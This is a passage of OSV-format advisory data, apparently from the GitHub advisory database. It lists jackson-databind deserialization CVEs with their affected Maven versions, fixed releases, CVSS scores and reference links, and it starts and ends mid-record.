"2020-03-02T17:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cggj-fvv3-cqwv", "published": "2018-10-16T17:45:18Z", "modified": "2024-03-15T01:18:46.938616Z", "aliases": [ "CVE-2018-7489" ], "summary": "FasterXML jackson-databind allows unauthenticated remote code execution ", "details": "FasterXML jackson-databind before before 2.6.7.5, 2.7.x before 2.7.9.3, 2.8.x before 2.8.11.1, and 2.9.x before 2.9.5 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the c3p0 libraries are available in the classpath.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.1" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.8.11.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-cggj-fvv3-cqwv/GHSA-cggj-fvv3-cqwv.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.5" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-cggj-fvv3-cqwv/GHSA-cggj-fvv3-cqwv.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.3" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-cggj-fvv3-cqwv/GHSA-cggj-fvv3-cqwv.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.6.7.5" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2018/10/GHSA-cggj-fvv3-cqwv/GHSA-cggj-fvv3-cqwv.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-7489" }, { "type": "WEB", "url": 
"https://github.com/FasterXML/jackson-databind/issues/1931" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/e66c0a9d3c926ff1b63bf586c824ead1d02f2a3d" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/ca2bfc86af82a1479112004b663ba74c760752e6" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/c921f0935d5e41bf206e702d8077a275ba1a6efc" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/6799f8f10cc78e9af6d443ed6982d00a13f2e7d2" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/bc22f90eb7f896ace9567598a99cb1ff6e0f9d9d" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.debian.org/security/2018/dsa-4190" }, { "type": "WEB", "url": "https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US\u0026docId=emr_na-hpesbhf03902en_us" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20180328-0001" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1d4a247329a8478073163567bbc8c8cb6b49c6bfc2bf58153a857af1@%3Ccommits.druid.apache.org%3E" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-cggj-fvv3-cqwv" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2939" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2938" }, { 
"type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2090" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2089" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:2088" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1786" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1451" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1450" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1449" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1448" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2018:1447" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html" }, { "type": "WEB", "url": "http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html" } ], "database_specific": { "cwe_ids": [ "CWE-184", "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T21:31:30Z", "nvd_published_at": "2018-02-26T15:29:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cjjf-94ff-43w7", "published": "2019-03-25T18:03:09Z", "modified": "2024-03-11T05:19:23.395848Z", "aliases": [ "CVE-2018-12022" ], "summary": "jackson-databind Deserialization of Untrusted Data vulnerability", "details": "An issue was discovered in FasterXML jackson-databind prior to 2.7.9.4, 2.8.11.2, and 2.9.6. 
When Default Typing is enabled (either globally or for a specific property), the service has the Jodd-db jar (for database access for the Jodd framework) in the classpath, and an attacker can provide an LDAP service to access, it is possible to make the service execute a malicious payload.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.7.9.4" } ] } ], "versions": [ "2.0.0", "2.0.0-RC1", "2.0.0-RC2", "2.0.0-RC3", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2", "2.6.7.3", "2.6.7.4", "2.6.7.5", "2.7.0", "2.7.0-rc1", "2.7.0-rc2", "2.7.0-rc3", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.9.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/03/GHSA-cjjf-94ff-43w7/GHSA-cjjf-94ff-43w7.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.2" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.2", 
"2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.8.11.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/03/GHSA-cjjf-94ff-43w7/GHSA-cjjf-94ff-43w7.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.6" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/03/GHSA-cjjf-94ff-43w7/GHSA-cjjf-94ff-43w7.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-12022" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2052" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/bf261d404c2f79fd3406237710d40ebb03c99d84" }, { "type": "ADVISORY", "url": "https://github.com/advisories/GHSA-cjjf-94ff-43w7" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/7fcf88aff0d1deaa5c3c7be8d58c05ad7ad5da94b59065d8e7c50c5d@%3Cissues.lucene.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZEDLDUYBSTDY4GWDBUXGJNS2RFYTFVRC" }, { "type": "WEB", "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "type": "WEB", "url": "https://seclists.org/bugtraq/2019/May/68" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190530-0003" }, { "type": "WEB", "url": "https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf" }, { "type": "WEB", "url": "https://www.debian.org/security/2019/dsa-4452" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuapr2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHBA-2019:0959" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:0877" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1106" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1107" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1108" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1140" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1782" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1797" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:1822" }, { "type": "WEB", "url": 
"https://access.redhat.com/errata/RHSA-2019:1823" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2804" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3002" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3140" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3892" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:4037" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1671098" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/107585" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2020-06-16T20:42:00Z", "nvd_published_at": "2019-03-21T16:00:12Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cmfg-87vq-g5g4", "published": "2019-07-17T15:26:12Z", "modified": "2024-03-15T01:18:17.903231Z", "aliases": [ "CVE-2019-12814" ], "summary": "Deserialization of untrusted data in FasterXML jackson-databind", "details": "A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x through 2.9.9. 
When Default Typing is enabled (either globally or for a specific property) for an externally exposed JSON endpoint and the service has JDOM 1.x or 2.x jar in the classpath, an attacker can send a specifically crafted JSON message that allows them to read arbitrary local files on the server.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.9.0" }, { "fixed": "2.9.9.1" } ] } ], "versions": [ "2.9.0", "2.9.0.pr1", "2.9.0.pr2", "2.9.0.pr3", "2.9.0.pr4", "2.9.1", "2.9.2", "2.9.3", "2.9.4", "2.9.5", "2.9.6", "2.9.7", "2.9.8", "2.9.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-cmfg-87vq-g5g4/GHSA-cmfg-87vq-g5g4.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.8.0" }, { "fixed": "2.8.11.4" } ] } ], "versions": [ "2.8.0", "2.8.1", "2.8.10", "2.8.11", "2.8.11.1", "2.8.11.2", "2.8.11.3", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.8.6", "2.8.7", "2.8.8", "2.8.8.1", "2.8.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-cmfg-87vq-g5g4/GHSA-cmfg-87vq-g5g4.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.9.6" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-cmfg-87vq-g5g4/GHSA-cmfg-87vq-g5g4.json" } }, { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.6.7.3" } ] } ], "versions": [ "2.0.0", "2.0.1", "2.0.2", "2.0.4", "2.0.5", "2.0.6", "2.1.0", "2.1.1", "2.1.2", "2.1.3", "2.1.4", "2.1.5", "2.2.0", "2.2.0-rc1", "2.2.1", "2.2.2", "2.2.3", "2.2.4", "2.3.0", "2.3.0-rc1", "2.3.1", "2.3.2", "2.3.3", "2.3.4", "2.3.5", "2.4.0", "2.4.0-rc1", "2.4.0-rc2", "2.4.0-rc3", "2.4.1", "2.4.1.1", "2.4.1.2", "2.4.1.3", "2.4.2", "2.4.3", "2.4.4", "2.4.5", "2.4.5.1", "2.4.6", "2.4.6.1", "2.5.0", "2.5.0-rc1", "2.5.1", "2.5.2", "2.5.3", "2.5.4", "2.5.5", "2.6.0", "2.6.0-rc1", "2.6.0-rc2", "2.6.0-rc3", "2.6.0-rc4", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.6.6", "2.6.7", "2.6.7.1", "2.6.7.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2019/07/GHSA-cmfg-87vq-g5g4/GHSA-cmfg-87vq-g5g4.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-12814" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/issues/2341" }, { "type": "WEB", "url": "https://github.com/FasterXML/jackson-databind/commit/5f7c69bba07a7155adde130d9dee2e54a54f1fa5" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ee0a051428d2c719acfa297d0854a189ea5e284ef3ed491fa672f4be@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/e0733058c0366b703e6757d8d2a7a04b943581f659e9c271f0841dfe@%3Cnotifications.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/bf20574dbc2db255f1fd489942b5720f675e32a2c4f44eb6a36060cd@%3Ccommits.accumulo.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/bcce5a9c532b386c68dab2f6b3ce8b0cc9b950ec551766e76391caa3@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b148fa2e9ef468c4de00de255dd728b74e2a97d935f8ced31eb41ba2@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0a2b2cca072650dbd5882719976c3d353972c44f6736ddf0ba95209@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/b0656d359c7d40ec9f39c8cc61bca66802ef9a2a12ee199f5b0c1442@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a78239b1f11cddfa86e4edee19064c40b6272214630bfef070c37957@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a62aa2706105d68f1c02023fe24aaa3c13b4d8a1826181fed07d9682@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/a3ae8a8c5e32c413cd27071d3a204166050bf79ce7f1299f6866338f@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/940b4c3fef002461b89a050935337056d4a036a65ef68e0bbd4621ef@%3Cdev.struts.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/8fe2983f6d9fee0aa737e4bd24483f8f5cf9b938b9adad0c4e79b2a4@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/87e46591de8925f719664a845572d184027258c5a7af0a471b53c77b@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/71f9ffd92410a889e27b95a219eaa843fd820f8550898633d85d4ea3@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/eff7280055fc717ea8129cd28a9dd57b8446d00b36260c1caee10b87@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/f9bc3e55f4e28d1dcd1a69aae6d53e609a758e34d2869b4d798e13cc@%3Cissues.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rca37935d661f4689cb4119f1b3b224413b22be161b678e6e6ce0c69b@%3Ccommits.nifi.apache.org%3E" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2019/06/msg00019.html" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OVRZDN2T6AZ6DJCZJ3VSIQIVHBVMVWBL" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXRVXNRFHJSQWFHPRJQRI5UPMZ63B544" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UKUALE2TUCKEKOHE2D342PQXN4MWCSLC" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20190625-0006" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujan2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpujul2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html" }, { "type": "WEB", "url": "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2858" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2935" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2936" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2937" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:2938" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3044" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3045" }, { "type": "WEB", "url": 
"https://access.redhat.com/errata/RHSA-2019:3046" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3050" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3149" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3200" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3292" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2019:3297" }, { "type": "PACKAGE", "url": "https://github.com/FasterXML/jackson-databind" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/0d4b630d9ee724aee50703397d9d1afa2b2befc9395ba7797d0ccea9@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/129da0204c876f746636018751a086cc581e0e07bcdeb3ee22ff5731@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/15a55e1d837fa686db493137cc0330c7ee1089ed9a9eea7ae7151ef1@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/1e04d9381c801b31ab28dec813c31c304b2a596b2a3707fa5462c5c0@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/28be28ffd6471d230943a255c36fe196a54ef5afc494a4781d16e37c@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2d2a76440becb610b9a9cb49b15eac3934b02c2dbcaacde1000353e4@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/2ff264b6a94c5363a35c4c88fa93216f60ec54d1d973ed6b76a9f560@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/34717424b4d08b74f65c09a083d6dd1cb0763f37a15d6de135998c1d@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/3f99ae8dcdbd69438cb733d745ee3ad5e852068490719a66509b4592@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread.html/4b832d1327703d6b287a6d223307f8f884d798821209a10647e93324@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/519eb0fd45642dcecd9ff74cb3e71c20a4753f7d82e2f07864b5108f@%3Cdev.drill.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/56c8042873595b8c863054c7bfccab4bf2c01c6f5abedae249d914b9@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5ecc333113b139429f4f05000d4aa2886974d4df3269c1dd990bb319@%3Cdev.tomee.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/5fc0e16b7af2590bf1e97c76c136291c4fdb244ee63c65c485c9a7a1@%3Cdev.tomee.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2019-07-17T14:51:50Z", "nvd_published_at": "2019-06-19T14:15:10Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cvm9-fjm9-3572", "published": "2021-12-09T19:16:10Z", "modified": "2024-02-18T05:25:36.165759Z", "aliases": [ "CVE-2020-36181" ], "summary": "Unsafe Deserialization in jackson-databind", "details": "FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.cpdsadapter.DriverAdapterCPDS`.", "affected": [ { "package": { "name": "com.fasterxml.jackson.core:jackson-databind", "ecosystem": "Maven", "purl": "pkg:maven/com.fasterxml.jackson.core/jackson-databind" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.9.10.8" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.1-1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.7.8", "2.7.9", "2.7.9.1", "2.7.9.2", "2.7.9.3", "2.7.9.4", "2.7.9.5", "2.7.9.6", "2.7.9.7", "2.8.0", "2.8.0.rc1", "2.8.0.rc2", "2.8.1", "2.8.10", 
